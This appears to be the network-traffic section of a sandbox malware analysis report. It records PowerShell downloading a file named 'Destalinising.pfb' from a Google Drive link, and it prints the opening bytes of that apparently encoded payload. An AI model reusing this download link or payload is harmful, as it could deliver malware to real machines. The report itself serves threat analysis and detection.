Sep 9, 2024 08:55:37.646213055 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646255016 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.646258116 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646269083 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646303892 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646315098 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.646337032 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646347046 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.646347046 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.646352053 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.646390915 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.646390915 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647125006 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647173882 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647186041 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647191048 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647218943 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647234917 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647243023 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647248983 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647303104 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647303104 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647310019 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.647357941 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.647979021 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648037910 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.648039103 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648049116 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648092031 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.648096085 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648104906 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648139000 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.648844957 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648905993 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.648910999 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648941040 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648958921 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.648967028 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.648983955 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649022102 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649027109 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649081945 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649694920 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649743080 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649746895 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649775028 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649794102 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649801016 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649812937 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649822950 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649846077 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649849892 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.649882078 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.649909019 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.650557041 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.650609970 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.650636911 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.650648117 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.650648117 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.650654078 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.650684118 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.650707006 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.650711060 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.650762081 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.651437998 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.651490927 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.651501894 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.651506901 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.651535988 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.651552916 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.651556015 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.651648998 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.651973963 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652019024 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.652034998 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652080059 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.652348042 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652388096 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.652391911 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652424097 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652430058 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.652434111 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652472973 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.652477980 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.652517080 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653222084 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653265953 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653362036 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653403997 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653409958 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653444052 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653451920 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653456926 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653486013 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653495073 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653503895 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653510094 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653541088 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653551102 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653573036 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653580904 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653592110 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653611898 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653631926 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653636932 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653654099 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653666973 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653697014 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653698921 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653703928 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653721094 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653745890 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653760910 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653765917 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653796911 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653796911 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.653805017 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.653844118 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654232979 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654277086 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654289961 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654321909 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654333115 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654336929 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654364109 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654370070 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654393911 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654402971 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654426098 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654449940 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654498100 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654541016 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654555082 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654586077 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654603004 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654607058 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654639006 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654649019 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654670954 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654670954 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654679060 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654705048 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654706001 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654726982 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654732943 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654736996 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.654764891 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.654792070 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655200958 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655257940 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655270100 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655275106 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655301094 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655311108 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655333996 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655339003 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655349970 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655371904 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655383110 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655388117 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655419111 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655483007 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655488014 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655553102 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655664921 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655723095 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655738115 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655742884 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655776978 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655808926 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655822039 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655834913 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655849934 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655878067 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655889988 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655894995 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655929089 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655957937 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.655971050 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655971050 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.655976057 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656008005 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656008959 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656025887 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656032085 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656050920 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656056881 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656084061 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656090021 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656094074 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656117916 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656156063 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656826973 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656883001 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656892061 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656898022 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656936884 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656943083 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656971931 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.656972885 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656980991 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.656984091 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657021046 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657030106 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657043934 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657066107 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657077074 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657103062 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657108068 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657119036 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657138109 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657155991 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657169104 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657180071 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657203913 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657231092 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657253027 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657253027 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657258034 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657270908 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657321930 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657325983 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657367945 CEST	443	49708	142.250.181.225	192.168.2.7
Sep 9, 2024 08:55:37.657380104 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657404900 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657447100 CEST	49708	443	192.168.2.7	142.250.181.225
Sep 9, 2024 08:55:37.657464027 CEST	443	49708	142.250.181.225	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 9, 2024 08:55:06.313965082 CEST	60843	53	192.168.2.7	1.1.1.1
Sep 9, 2024 08:55:06.320771933 CEST	53	60843	1.1.1.1	192.168.2.7
Sep 9, 2024 08:55:07.387386084 CEST	63962	53	192.168.2.7	1.1.1.1
Sep 9, 2024 08:55:07.400599957 CEST	53	63962	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 9, 2024 08:55:06.313965082 CEST	192.168.2.7	1.1.1.1	0xc58f	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Sep 9, 2024 08:55:07.387386084 CEST	192.168.2.7	1.1.1.1	0x5b45	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 9, 2024 08:55:01.497580051 CEST	1.1.1.1	192.168.2.7	0x2dc5	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 9, 2024 08:55:01.497580051 CEST	1.1.1.1	192.168.2.7	0x2dc5	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 9, 2024 08:55:06.320771933 CEST	1.1.1.1	192.168.2.7	0xc58f	No error (0)	drive.google.com	142.250.185.238	A (IP address)	IN (0x0001)	false
Sep 9, 2024 08:55:07.400599957 CEST	1.1.1.1	192.168.2.7	0x5b45	No error (0)	drive.usercontent.google.com	142.250.181.225	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	142.250.185.238	443	5504	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-09 06:55:07 UTC	215	OUT	GET /uc?export=download&id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Connection: Keep-Alive
2024-09-09 06:55:07 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 09 Sep 2024 06:55:07 GMT Location: https://drive.usercontent.google.com/download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-tg5GRzv_5GESXwVa1ZROAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	142.250.181.225	443	5504	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-09 06:55:08 UTC	233	OUT	GET /download?id=12yWhDkP2A-D0-PYYq5cyfheo3EpSe_9K&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.usercontent.google.com Connection: Keep-Alive
2024-09-09 06:55:10 UTC	4850	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="Destalinising.pfb" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 473384 Last-Modified: Mon, 09 Sep 2024 04:31:23 GMT X-GUploader-UploadID: AD-8ljuZKiXfSosh9_uF-H-Nnjzbjiv1N6r8zfzVEAHCmciDcbF1UaTyCZKURI385gwv1FW_lg0 Date: Mon, 09 Sep 2024 06:55:10 GMT Expires: Mon, 09 Sep 2024 06:55:10 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=8hKdWQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-09 06:55:10 UTC	4850	IN	Data Raw: 36 77 49 4e 55 48 45 42 6d 37 74 76 57 42 6f 41 36 77 4b 49 6c 4f 73 43 55 32 34 44 58 43 51 45 36 77 4b 2f 7a 6e 45 42 6d 37 6b 52 74 70 64 2f 63 51 47 62 63 51 47 62 67 66 47 6b 62 4d 35 69 63 51 47 62 36 77 49 70 66 34 48 42 53 79 57 6d 34 75 73 43 44 63 52 78 41 5a 76 72 41 72 4a 32 63 51 47 62 75 6f 32 43 4c 6a 39 78 41 5a 74 78 41 5a 74 78 41 5a 76 72 41 67 58 55 4d 63 72 72 41 70 36 36 63 51 47 62 69 52 51 4c 36 77 4b 44 49 58 45 42 6d 39 48 69 36 77 49 63 7a 65 73 43 39 65 47 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 56 48 61 2f 41 4a 38 79 2b 73 43 58 34 54 72 41 71 6e 46 69 30 51 6b 42 4f 73 43 70 51 6e 72 41 74 6e 57 69 63 50 72 41 6e 38 61 63 51 47 62 67 63 4e 55 48 70 67 43 63 51 47 62 36 77 49 6b 74 4c 70 69 77 55 33 65 36 77 4a 72 35 33 45 Data Ascii: 6wINUHEBm7tvWBoA6wKIlOsCU24DXCQE6wK/znEBm7kRtpd/cQGbcQGbgfGkbM5icQGb6wIpf4HBSyWm4usCDcRxAZvrArJ2cQGbuo2CLj9xAZtxAZtxAZvrAgXUMcrrAp66cQGbiRQL6wKDIXEBm9Hi6wIczesC9eGDwQRxAZtxAZuB+VHa/AJ8y+sCX4TrAqnFi0QkBOsCpQnrAtnWicPrAn8acQGbgcNUHpgCcQGb6wIktLpiwU3e6wJr53E
